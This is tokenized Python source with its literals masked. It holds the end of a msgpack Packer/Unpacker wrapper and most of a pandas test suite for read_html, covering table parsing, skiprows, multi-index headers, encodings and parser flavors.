__init__ ( default = default , <EOL> encoding = encoding , <EOL> unicode_errors = unicode_errors , <EOL> use_single_float = use_single_float , <EOL> autoreset = autoreset , <EOL> use_bin_type = use_bin_type ) <EOL> class Unpacker ( _Unpacker ) : <EOL> def __init__ ( self , file_like = None , read_size = <NUM_LIT:0> , use_list = False , <EOL> object_hook = decode , <EOL> object_pairs_hook = None , list_hook = None , encoding = '<STR_LIT:utf-8>' , <EOL> unicode_errors = '<STR_LIT:strict>' , max_buffer_size = <NUM_LIT:0> , ext_hook = ExtType ) : <EOL> super ( Unpacker , self ) . __init__ ( file_like = file_like , <EOL> read_size = read_size , <EOL> use_list = use_list , <EOL> object_hook = object_hook , <EOL> object_pairs_hook = object_pairs_hook , <EOL> list_hook = list_hook , <EOL> encoding = encoding , <EOL> unicode_errors = unicode_errors , <EOL> max_buffer_size = max_buffer_size , <EOL> ext_hook = ext_hook ) <EOL> class Iterator ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , path , ** kwargs ) : <EOL> self . path = path <EOL> self . kwargs = kwargs <EOL> def __iter__ ( self ) : <EOL> needs_closing = True <EOL> try : <EOL> if isinstance ( self . path , compat . string_types ) : <EOL> try : <EOL> path_exists = os . path . exists ( self . path ) <EOL> except TypeError : <EOL> path_exists = False <EOL> if path_exists : <EOL> fh = open ( self . path , '<STR_LIT:rb>' ) <EOL> else : <EOL> fh = compat . BytesIO ( self . path ) <EOL> else : <EOL> if not hasattr ( self . path , '<STR_LIT>' ) : <EOL> fh = compat . BytesIO ( self . path ) <EOL> else : <EOL> needs_closing = False <EOL> fh = self . path <EOL> unpacker = unpack ( fh ) <EOL> for o in unpacker : <EOL> yield o <EOL> finally : <EOL> if needs_closing : <EOL> fh . close ( ) </s>
<s> from __future__ import print_function <EOL> import glob <EOL> import os <EOL> import re <EOL> import warnings <EOL> try : <EOL> from importlib import import_module <EOL> except ImportError : <EOL> import_module = __import__ <EOL> from distutils . version import LooseVersion <EOL> import nose <EOL> import numpy as np <EOL> from numpy . random import rand <EOL> from numpy . testing . decorators import slow <EOL> from pandas import ( DataFrame , MultiIndex , read_csv , Timestamp , Index , <EOL> date_range , Series ) <EOL> from pandas . compat import ( map , zip , StringIO , string_types , BytesIO , <EOL> is_platform_windows ) <EOL> from pandas . io . common import URLError , urlopen , file_path_to_url <EOL> from pandas . io . html import read_html <EOL> from pandas . parser import CParserError <EOL> import pandas . util . testing as tm <EOL> from pandas . util . testing import makeCustomDataframe as mkdf , network <EOL> def _have_module ( module_name ) : <EOL> try : <EOL> import_module ( module_name ) <EOL> return True <EOL> except ImportError : <EOL> return False <EOL> def _skip_if_no ( module_name ) : <EOL> if not _have_module ( module_name ) : <EOL> raise nose . SkipTest ( "<STR_LIT>" . format ( module_name ) ) <EOL> def _skip_if_none_of ( module_names ) : <EOL> if isinstance ( module_names , string_types ) : <EOL> _skip_if_no ( module_names ) <EOL> if module_names == '<STR_LIT>' : <EOL> import bs4 <EOL> if bs4 . __version__ == LooseVersion ( '<STR_LIT>' ) : <EOL> raise nose . SkipTest ( "<STR_LIT>" ) <EOL> else : <EOL> not_found = [ module_name for module_name in module_names if not <EOL> _have_module ( module_name ) ] <EOL> if set ( not_found ) & set ( module_names ) : <EOL> raise nose . SkipTest ( "<STR_LIT>" . format ( not_found ) ) <EOL> if '<STR_LIT>' in module_names : <EOL> import bs4 <EOL> if bs4 . __version__ == LooseVersion ( '<STR_LIT>' ) : <EOL> raise nose . SkipTest ( "<STR_LIT>" ) <EOL> DATA_PATH = tm . 
get_data_path ( ) <EOL> def assert_framelist_equal ( list1 , list2 , * args , ** kwargs ) : <EOL> assert len ( list1 ) == len ( list2 ) , ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( len ( list1 ) , <EOL> len ( list2 ) ) ) <EOL> msg = '<STR_LIT>' <EOL> both_frames = all ( map ( lambda x , y : isinstance ( x , DataFrame ) and <EOL> isinstance ( y , DataFrame ) , list1 , list2 ) ) <EOL> assert both_frames , msg <EOL> for frame_i , frame_j in zip ( list1 , list2 ) : <EOL> tm . assert_frame_equal ( frame_i , frame_j , * args , ** kwargs ) <EOL> assert not frame_i . empty , '<STR_LIT>' <EOL> def test_bs4_version_fails ( ) : <EOL> _skip_if_none_of ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> import bs4 <EOL> if bs4 . __version__ == LooseVersion ( '<STR_LIT>' ) : <EOL> tm . assert_raises ( AssertionError , read_html , os . path . join ( DATA_PATH , <EOL> "<STR_LIT>" ) , <EOL> flavor = '<STR_LIT>' ) <EOL> class ReadHtmlMixin ( object ) : <EOL> def read_html ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , self . flavor ) <EOL> return read_html ( * args , ** kwargs ) <EOL> class TestReadHtml ( tm . TestCase , ReadHtmlMixin ) : <EOL> flavor = '<STR_LIT>' <EOL> spam_data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> banklist_data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( TestReadHtml , cls ) . setUpClass ( ) <EOL> _skip_if_none_of ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def test_to_html_compat ( self ) : <EOL> df = mkdf ( <NUM_LIT:4> , <NUM_LIT:3> , data_gen_f = lambda * args : rand ( ) , c_idx_names = False , <EOL> r_idx_names = False ) . applymap ( '<STR_LIT>' . format ) . astype ( float ) <EOL> out = df . to_html ( ) <EOL> res = self . read_html ( out , attrs = { '<STR_LIT:class>' : '<STR_LIT>' } , index_col = <NUM_LIT:0> ) [ <NUM_LIT:0> ] <EOL> tm . 
assert_frame_equal ( res , df ) <EOL> @ network <EOL> def test_banklist_url ( self ) : <EOL> url = '<STR_LIT>' <EOL> df1 = self . read_html ( url , '<STR_LIT>' , <EOL> attrs = { "<STR_LIT:id>" : '<STR_LIT>' } ) <EOL> df2 = self . read_html ( url , '<STR_LIT>' , attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> @ network <EOL> def test_spam_url ( self ) : <EOL> url = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> df1 = self . read_html ( url , '<STR_LIT>' ) <EOL> df2 = self . read_html ( url , '<STR_LIT>' ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> @ slow <EOL> def test_banklist ( self ) : <EOL> df1 = self . read_html ( self . banklist_data , '<STR_LIT>' , <EOL> attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> df2 = self . read_html ( self . banklist_data , '<STR_LIT>' , <EOL> attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_spam_no_types ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> self . assertEqual ( df1 [ <NUM_LIT:0> ] . ix [ <NUM_LIT:0> , <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( df1 [ <NUM_LIT:0> ] . columns [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> def test_spam_with_types ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> self . assertEqual ( df1 [ <NUM_LIT:0> ] . ix [ <NUM_LIT:0> , <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( df1 [ <NUM_LIT:0> ] . columns [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> def test_spam_no_match ( self ) : <EOL> dfs = self . read_html ( self . spam_data ) <EOL> for df in dfs : <EOL> tm . assertIsInstance ( df , DataFrame ) <EOL> def test_banklist_no_match ( self ) : <EOL> dfs = self . read_html ( self . 
banklist_data , attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> for df in dfs : <EOL> tm . assertIsInstance ( df , DataFrame ) <EOL> def test_spam_header ( self ) : <EOL> df = self . read_html ( self . spam_data , '<STR_LIT>' , header = <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( df . columns [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> self . assertFalse ( df . empty ) <EOL> def test_skiprows_int ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = <NUM_LIT:1> ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = <NUM_LIT:1> ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_skiprows_xrange ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = range ( <NUM_LIT:2> ) ) [ <NUM_LIT:0> ] <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = range ( <NUM_LIT:2> ) ) [ <NUM_LIT:0> ] <EOL> tm . assert_frame_equal ( df1 , df2 ) <EOL> def test_skiprows_list ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = [ <NUM_LIT:2> , <NUM_LIT:1> ] ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_skiprows_set ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = set ( [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = set ( [ <NUM_LIT:2> , <NUM_LIT:1> ] ) ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_skiprows_slice ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = <NUM_LIT:1> ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = <NUM_LIT:1> ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_skiprows_slice_short ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = slice ( <NUM_LIT:2> ) ) <EOL> df2 = self . 
read_html ( self . spam_data , '<STR_LIT>' , skiprows = slice ( <NUM_LIT:2> ) ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_skiprows_slice_long ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = slice ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = slice ( <NUM_LIT:4> , <NUM_LIT:1> , - <NUM_LIT:1> ) ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_skiprows_ndarray ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , <EOL> skiprows = np . arange ( <NUM_LIT:2> ) ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = np . arange ( <NUM_LIT:2> ) ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_skiprows_invalid ( self ) : <EOL> with tm . assertRaisesRegexp ( TypeError , <EOL> '<STR_LIT>' ) : <EOL> self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = '<STR_LIT>' ) <EOL> def test_index ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , index_col = <NUM_LIT:0> ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , index_col = <NUM_LIT:0> ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_header_and_index_no_types ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , header = <NUM_LIT:1> , <EOL> index_col = <NUM_LIT:0> ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , header = <NUM_LIT:1> , index_col = <NUM_LIT:0> ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_header_and_index_with_types ( self ) : <EOL> df1 = self . read_html ( self . spam_data , '<STR_LIT>' , header = <NUM_LIT:1> , <EOL> index_col = <NUM_LIT:0> ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , header = <NUM_LIT:1> , index_col = <NUM_LIT:0> ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_infer_types ( self ) : <EOL> df1 = self . read_html ( self . 
spam_data , '<STR_LIT>' , index_col = <NUM_LIT:0> ) <EOL> df2 = self . read_html ( self . spam_data , '<STR_LIT>' , index_col = <NUM_LIT:0> ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_string_io ( self ) : <EOL> with open ( self . spam_data ) as f : <EOL> data1 = StringIO ( f . read ( ) ) <EOL> with open ( self . spam_data ) as f : <EOL> data2 = StringIO ( f . read ( ) ) <EOL> df1 = self . read_html ( data1 , '<STR_LIT>' ) <EOL> df2 = self . read_html ( data2 , '<STR_LIT>' ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_string ( self ) : <EOL> with open ( self . spam_data ) as f : <EOL> data = f . read ( ) <EOL> df1 = self . read_html ( data , '<STR_LIT>' ) <EOL> df2 = self . read_html ( data , '<STR_LIT>' ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> def test_file_like ( self ) : <EOL> with open ( self . spam_data ) as f : <EOL> df1 = self . read_html ( f , '<STR_LIT>' ) <EOL> with open ( self . spam_data ) as f : <EOL> df2 = self . read_html ( f , '<STR_LIT>' ) <EOL> assert_framelist_equal ( df1 , df2 ) <EOL> @ network <EOL> def test_bad_url_protocol ( self ) : <EOL> with tm . assertRaises ( URLError ) : <EOL> self . read_html ( '<STR_LIT>' , match = '<STR_LIT>' ) <EOL> @ network <EOL> def test_invalid_url ( self ) : <EOL> try : <EOL> with tm . assertRaises ( URLError ) : <EOL> self . read_html ( '<STR_LIT>' , <EOL> match = '<STR_LIT>' ) <EOL> except ValueError as e : <EOL> tm . assert_equal ( str ( e ) , '<STR_LIT>' ) <EOL> @ slow <EOL> def test_file_url ( self ) : <EOL> url = self . banklist_data <EOL> dfs = self . read_html ( file_path_to_url ( url ) , '<STR_LIT>' , <EOL> attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> tm . assertIsInstance ( dfs , list ) <EOL> for df in dfs : <EOL> tm . assertIsInstance ( df , DataFrame ) <EOL> @ slow <EOL> def test_invalid_table_attrs ( self ) : <EOL> url = self . banklist_data <EOL> with tm . assertRaisesRegexp ( ValueError , '<STR_LIT>' ) : <EOL> self . 
read_html ( url , '<STR_LIT>' , <EOL> attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> def _bank_data ( self , * args , ** kwargs ) : <EOL> return self . read_html ( self . banklist_data , '<STR_LIT>' , <EOL> attrs = { '<STR_LIT:id>' : '<STR_LIT>' } , * args , ** kwargs ) <EOL> @ slow <EOL> def test_multiindex_header ( self ) : <EOL> df = self . _bank_data ( header = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> tm . assertIsInstance ( df . columns , MultiIndex ) <EOL> @ slow <EOL> def test_multiindex_index ( self ) : <EOL> df = self . _bank_data ( index_col = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> tm . assertIsInstance ( df . index , MultiIndex ) <EOL> @ slow <EOL> def test_multiindex_header_index ( self ) : <EOL> df = self . _bank_data ( header = [ <NUM_LIT:0> , <NUM_LIT:1> ] , index_col = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> tm . assertIsInstance ( df . columns , MultiIndex ) <EOL> tm . assertIsInstance ( df . index , MultiIndex ) <EOL> @ slow <EOL> def test_multiindex_header_skiprows_tuples ( self ) : <EOL> df = self . _bank_data ( header = [ <NUM_LIT:0> , <NUM_LIT:1> ] , skiprows = <NUM_LIT:1> , tupleize_cols = True ) [ <NUM_LIT:0> ] <EOL> tm . assertIsInstance ( df . columns , Index ) <EOL> @ slow <EOL> def test_multiindex_header_skiprows ( self ) : <EOL> df = self . _bank_data ( header = [ <NUM_LIT:0> , <NUM_LIT:1> ] , skiprows = <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> tm . assertIsInstance ( df . columns , MultiIndex ) <EOL> @ slow <EOL> def test_multiindex_header_index_skiprows ( self ) : <EOL> df = self . _bank_data ( header = [ <NUM_LIT:0> , <NUM_LIT:1> ] , index_col = [ <NUM_LIT:0> , <NUM_LIT:1> ] , skiprows = <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> tm . assertIsInstance ( df . index , MultiIndex ) <EOL> tm . assertIsInstance ( df . columns , MultiIndex ) <EOL> @ slow <EOL> def test_regex_idempotency ( self ) : <EOL> url = self . banklist_data <EOL> dfs = self . read_html ( file_path_to_url ( url ) , <EOL> match = re . 
compile ( re . compile ( '<STR_LIT>' ) ) , <EOL> attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> tm . assertIsInstance ( dfs , list ) <EOL> for df in dfs : <EOL> tm . assertIsInstance ( df , DataFrame ) <EOL> def test_negative_skiprows ( self ) : <EOL> with tm . assertRaisesRegexp ( ValueError , <EOL> '<STR_LIT>' ) : <EOL> self . read_html ( self . spam_data , '<STR_LIT>' , skiprows = - <NUM_LIT:1> ) <EOL> @ network <EOL> def test_multiple_matches ( self ) : <EOL> url = '<STR_LIT>' <EOL> dfs = self . read_html ( url , match = '<STR_LIT>' ) <EOL> self . assertTrue ( len ( dfs ) > <NUM_LIT:1> ) <EOL> @ network <EOL> def test_python_docs_table ( self ) : <EOL> url = '<STR_LIT>' <EOL> dfs = self . read_html ( url , match = '<STR_LIT>' ) <EOL> zz = [ df . iloc [ <NUM_LIT:0> , <NUM_LIT:0> ] [ <NUM_LIT:0> : <NUM_LIT:4> ] for df in dfs ] <EOL> self . assertEqual ( sorted ( zz ) , sorted ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> @ slow <EOL> def test_thousands_macau_stats ( self ) : <EOL> all_non_nan_table_index = - <NUM_LIT:2> <EOL> macau_data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> dfs = self . read_html ( macau_data , index_col = <NUM_LIT:0> , <EOL> attrs = { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> df = dfs [ all_non_nan_table_index ] <EOL> self . assertFalse ( any ( s . isnull ( ) . any ( ) for _ , s in df . iteritems ( ) ) ) <EOL> @ slow <EOL> def test_thousands_macau_index_col ( self ) : <EOL> all_non_nan_table_index = - <NUM_LIT:2> <EOL> macau_data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> dfs = self . read_html ( macau_data , index_col = <NUM_LIT:0> , header = <NUM_LIT:0> ) <EOL> df = dfs [ all_non_nan_table_index ] <EOL> self . assertFalse ( any ( s . isnull ( ) . any ( ) for _ , s in df . iteritems ( ) ) ) <EOL> def test_empty_tables ( self ) : <EOL> """<STR_LIT>""" <EOL> data1 = '''<STR_LIT>''' <EOL> data2 = data1 + '''<STR_LIT>''' <EOL> res1 = self . read_html ( StringIO ( data1 ) ) <EOL> res2 = self . 
read_html ( StringIO ( data2 ) ) <EOL> assert_framelist_equal ( res1 , res2 ) <EOL> def test_header_and_one_column ( self ) : <EOL> """<STR_LIT>""" <EOL> data = StringIO ( '''<STR_LIT>''' ) <EOL> expected = DataFrame ( data = { '<STR_LIT>' : '<STR_LIT>' } , index = [ <NUM_LIT:0> ] ) <EOL> result = self . read_html ( data ) [ <NUM_LIT:0> ] <EOL> tm . assert_frame_equal ( result , expected ) <EOL> def test_tfoot_read ( self ) : <EOL> """<STR_LIT>""" <EOL> data_template = '''<STR_LIT>''' <EOL> data1 = data_template . format ( footer = "<STR_LIT>" ) <EOL> data2 = data_template . format ( <EOL> footer = "<STR_LIT>" ) <EOL> d1 = { '<STR_LIT:A>' : [ '<STR_LIT>' ] , '<STR_LIT:B>' : [ '<STR_LIT>' ] } <EOL> d2 = { '<STR_LIT:A>' : [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT:B>' : [ '<STR_LIT>' , '<STR_LIT>' ] } <EOL> tm . assert_frame_equal ( self . read_html ( data1 ) [ <NUM_LIT:0> ] , DataFrame ( d1 ) ) <EOL> tm . assert_frame_equal ( self . read_html ( data2 ) [ <NUM_LIT:0> ] , DataFrame ( d2 ) ) <EOL> def test_countries_municipalities ( self ) : <EOL> data1 = StringIO ( '''<STR_LIT>''' ) <EOL> data2 = StringIO ( '''<STR_LIT>''' ) <EOL> res1 = self . read_html ( data1 ) <EOL> res2 = self . read_html ( data2 , header = <NUM_LIT:0> ) <EOL> assert_framelist_equal ( res1 , res2 ) <EOL> def test_nyse_wsj_commas_table ( self ) : <EOL> data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> df = self . read_html ( data , index_col = <NUM_LIT:0> , header = <NUM_LIT:0> , <EOL> attrs = { '<STR_LIT:class>' : '<STR_LIT>' } ) [ <NUM_LIT:0> ] <EOL> columns = Index ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> nrows = <NUM_LIT:100> <EOL> self . assertEqual ( df . shape [ <NUM_LIT:0> ] , nrows ) <EOL> self . assertTrue ( df . columns . equals ( columns ) ) <EOL> @ slow <EOL> def test_banklist_header ( self ) : <EOL> from pandas . io . 
html import _remove_whitespace <EOL> def try_remove_ws ( x ) : <EOL> try : <EOL> return _remove_whitespace ( x ) <EOL> except AttributeError : <EOL> return x <EOL> df = self . read_html ( self . banklist_data , '<STR_LIT>' , <EOL> attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) [ <NUM_LIT:0> ] <EOL> ground_truth = read_csv ( os . path . join ( DATA_PATH , '<STR_LIT>' ) , <EOL> converters = { '<STR_LIT>' : Timestamp , <EOL> '<STR_LIT>' : Timestamp } ) <EOL> self . assertEqual ( df . shape , ground_truth . shape ) <EOL> old = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> new = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> dfnew = df . applymap ( try_remove_ws ) . replace ( old , new ) <EOL> gtnew = ground_truth . applymap ( try_remove_ws ) <EOL> converted = dfnew . _convert ( datetime = True , numeric = True ) <EOL> date_cols = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> converted [ date_cols ] = converted [ date_cols ] . _convert ( datetime = True , <EOL> coerce = True ) <EOL> tm . assert_frame_equal ( converted , gtnew ) <EOL> @ slow <EOL> def test_gold_canyon ( self ) : <EOL> gc = '<STR_LIT>' <EOL> with open ( self . banklist_data , '<STR_LIT:r>' ) as f : <EOL> raw_text = f . read ( ) <EOL> self . assertIn ( gc , raw_text ) <EOL> df = self . read_html ( self . banklist_data , '<STR_LIT>' , <EOL> attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) [ <NUM_LIT:0> ] <EOL> self . assertIn ( gc , df . to_string ( ) ) <EOL> def test_different_number_of_rows ( self ) : <EOL> expected = """<STR_LIT>""" <EOL> out = """<STR_LIT>""" <EOL> expected = self . read_html ( expected , index_col = <NUM_LIT:0> ) [ <NUM_LIT:0> ] <EOL> res = self . read_html ( out , index_col = <NUM_LIT:0> ) [ <NUM_LIT:0> ] <EOL> tm . 
assert_frame_equal ( expected , res ) <EOL> def test_parse_dates_list ( self ) : <EOL> df = DataFrame ( { '<STR_LIT:date>' : date_range ( '<STR_LIT>' , periods = <NUM_LIT:10> ) } ) <EOL> expected = df . to_html ( ) <EOL> res = self . read_html ( expected , parse_dates = [ <NUM_LIT:1> ] , index_col = <NUM_LIT:0> ) <EOL> tm . assert_frame_equal ( df , res [ <NUM_LIT:0> ] ) <EOL> res = self . read_html ( expected , parse_dates = [ '<STR_LIT:date>' ] , index_col = <NUM_LIT:0> ) <EOL> tm . assert_frame_equal ( df , res [ <NUM_LIT:0> ] ) <EOL> def test_parse_dates_combine ( self ) : <EOL> raw_dates = Series ( date_range ( '<STR_LIT>' , periods = <NUM_LIT:10> ) ) <EOL> df = DataFrame ( { '<STR_LIT:date>' : raw_dates . map ( lambda x : str ( x . date ( ) ) ) , <EOL> '<STR_LIT:time>' : raw_dates . map ( lambda x : str ( x . time ( ) ) ) } ) <EOL> res = self . read_html ( df . to_html ( ) , parse_dates = { '<STR_LIT>' : [ <NUM_LIT:1> , <NUM_LIT:2> ] } , <EOL> index_col = <NUM_LIT:1> ) <EOL> newdf = DataFrame ( { '<STR_LIT>' : raw_dates } ) <EOL> tm . assert_frame_equal ( newdf , res [ <NUM_LIT:0> ] ) <EOL> def test_computer_sales_page ( self ) : <EOL> data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> with tm . assertRaisesRegexp ( CParserError , r"<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) : <EOL> self . read_html ( data , header = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> def test_wikipedia_states_table ( self ) : <EOL> data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> assert os . path . isfile ( data ) , '<STR_LIT>' % data <EOL> assert os . path . getsize ( data ) , '<STR_LIT>' % data <EOL> result = self . read_html ( data , '<STR_LIT>' , header = <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> nose . tools . assert_equal ( result [ '<STR_LIT>' ] . dtype , np . dtype ( '<STR_LIT>' ) ) <EOL> def test_bool_header_arg ( self ) : <EOL> for arg in [ True , False ] : <EOL> with tm . assertRaises ( TypeError ) : <EOL> read_html ( self . 
spam_data , header = arg ) <EOL> def _lang_enc ( filename ) : <EOL> return os . path . splitext ( os . path . basename ( filename ) ) [ <NUM_LIT:0> ] . split ( '<STR_LIT:_>' ) <EOL> class TestReadHtmlEncoding ( tm . TestCase ) : <EOL> files = glob . glob ( os . path . join ( DATA_PATH , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> flavor = '<STR_LIT>' <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( TestReadHtmlEncoding , cls ) . setUpClass ( ) <EOL> _skip_if_none_of ( ( cls . flavor , '<STR_LIT>' ) ) <EOL> def read_html ( self , * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = self . flavor <EOL> return read_html ( * args , ** kwargs ) <EOL> def read_filename ( self , f , encoding ) : <EOL> return self . read_html ( f , encoding = encoding , index_col = <NUM_LIT:0> ) <EOL> def read_file_like ( self , f , encoding ) : <EOL> with open ( f , '<STR_LIT:rb>' ) as fobj : <EOL> return self . read_html ( BytesIO ( fobj . read ( ) ) , encoding = encoding , <EOL> index_col = <NUM_LIT:0> ) <EOL> def read_string ( self , f , encoding ) : <EOL> with open ( f , '<STR_LIT:rb>' ) as fobj : <EOL> return self . read_html ( fobj . read ( ) , encoding = encoding , index_col = <NUM_LIT:0> ) <EOL> def test_encode ( self ) : <EOL> assert self . files , '<STR_LIT>' <EOL> for f in self . files : <EOL> _ , encoding = _lang_enc ( f ) <EOL> try : <EOL> from_string = self . read_string ( f , encoding ) . pop ( ) <EOL> from_file_like = self . read_file_like ( f , encoding ) . pop ( ) <EOL> from_filename = self . read_filename ( f , encoding ) . pop ( ) <EOL> tm . assert_frame_equal ( from_string , from_file_like ) <EOL> tm . 
assert_frame_equal ( from_string , from_filename ) <EOL> except Exception : <EOL> if is_platform_windows ( ) : <EOL> if '<STR_LIT>' in encoding or '<STR_LIT>' in encoding : <EOL> continue <EOL> raise <EOL> class TestReadHtmlEncodingLxml ( TestReadHtmlEncoding ) : <EOL> flavor = '<STR_LIT>' <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( TestReadHtmlEncodingLxml , cls ) . setUpClass ( ) <EOL> _skip_if_no ( cls . flavor ) <EOL> class TestReadHtmlLxml ( tm . TestCase , ReadHtmlMixin ) : <EOL> flavor = '<STR_LIT>' <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( TestReadHtmlLxml , cls ) . setUpClass ( ) <EOL> _skip_if_no ( '<STR_LIT>' ) <EOL> def test_data_fail ( self ) : <EOL> from lxml . etree import XMLSyntaxError <EOL> spam_data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> banklist_data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> with tm . assertRaises ( XMLSyntaxError ) : <EOL> self . read_html ( spam_data ) <EOL> with tm . assertRaises ( XMLSyntaxError ) : <EOL> self . read_html ( banklist_data ) <EOL> def test_works_on_valid_markup ( self ) : <EOL> filename = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> dfs = self . read_html ( filename , index_col = <NUM_LIT:0> ) <EOL> tm . assertIsInstance ( dfs , list ) <EOL> tm . assertIsInstance ( dfs [ <NUM_LIT:0> ] , DataFrame ) <EOL> @ slow <EOL> def test_fallback_success ( self ) : <EOL> _skip_if_none_of ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> banklist_data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> self . read_html ( 